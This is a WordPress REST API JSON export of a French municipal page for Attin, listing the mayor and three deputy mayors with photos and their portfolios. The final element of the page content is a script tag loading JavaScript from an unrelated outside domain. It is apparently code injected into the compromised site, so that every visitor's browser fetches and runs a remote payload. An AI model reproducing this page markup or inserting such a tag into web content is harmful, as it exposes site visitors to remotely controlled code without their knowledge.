{"id":2586,"date":"2020-06-09T11:14:29","date_gmt":"2020-06-09T10:14:29","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?page_id=2586"},"modified":"2020-06-09T11:14:29","modified_gmt":"2020-06-09T10:14:29","slug":"maire-et-adjoints","status":"publish","type":"page","link":"https:\/\/www.attin-mairie.fr\/?page_id=2586","title":{"rendered":"MAIRE ET ADJOINTS"},"content":{"rendered":"<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3602.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-2535\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3602-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3602-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3602-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3602-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>Philippe FOURCROY, Maire<\/p>\n<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3052.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2536\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3052-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3052-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3052-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3052-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>Dominique DACHICOURT, Premier Adjoint, Charg\u00e9 de l&rsquo;Am\u00e9nagement du Territoire et de la Communication Externe\/Interne<\/p>\n<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3479-e1590240227942.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2537\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3479-e1590240227942-200x300.jpg\" alt=\"\" width=\"200\" height=\"300\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3479-e1590240227942-200x300.jpg 200w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3479-e1590240227942-768x1152.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3479-e1590240227942-683x1024.jpg 683w\" sizes=\"(max-width: 200px) 100vw, 200px\" \/><\/a>Laurie GUYOT, Deuxi\u00e8me Adjointe, Charg\u00e9e des Affaires Sociales et du Logement<\/p>\n<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3489.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2538\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3489-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3489-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3489-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/05\/IMG_3489-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>Christian RAYMOND, Troisi\u00e8me Adjoint, Charg\u00e9 des Affaires Cultuelles et Travaux d&rsquo;Entretien<\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Philippe FOURCROY, Maire Dominique DACHICOURT, Premier Adjoint, Charg\u00e9 de l&rsquo;Am\u00e9nagement du Territoire et de la Communication Externe\/Interne Laurie GUYOT, Deuxi\u00e8me Adjointe, Charg\u00e9e des Affaires Sociales et du Logement Christian RAYMOND, Troisi\u00e8me Adjoint, Charg\u00e9 des Affaires Cultuelles et Travaux d&rsquo;Entretien<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-2586","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2586","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2586"}],"version-history":[{"count":3,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2586\/revisions"}],"predecessor-version":[{"id":2589,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2586\/revisions\/2589"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2586"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}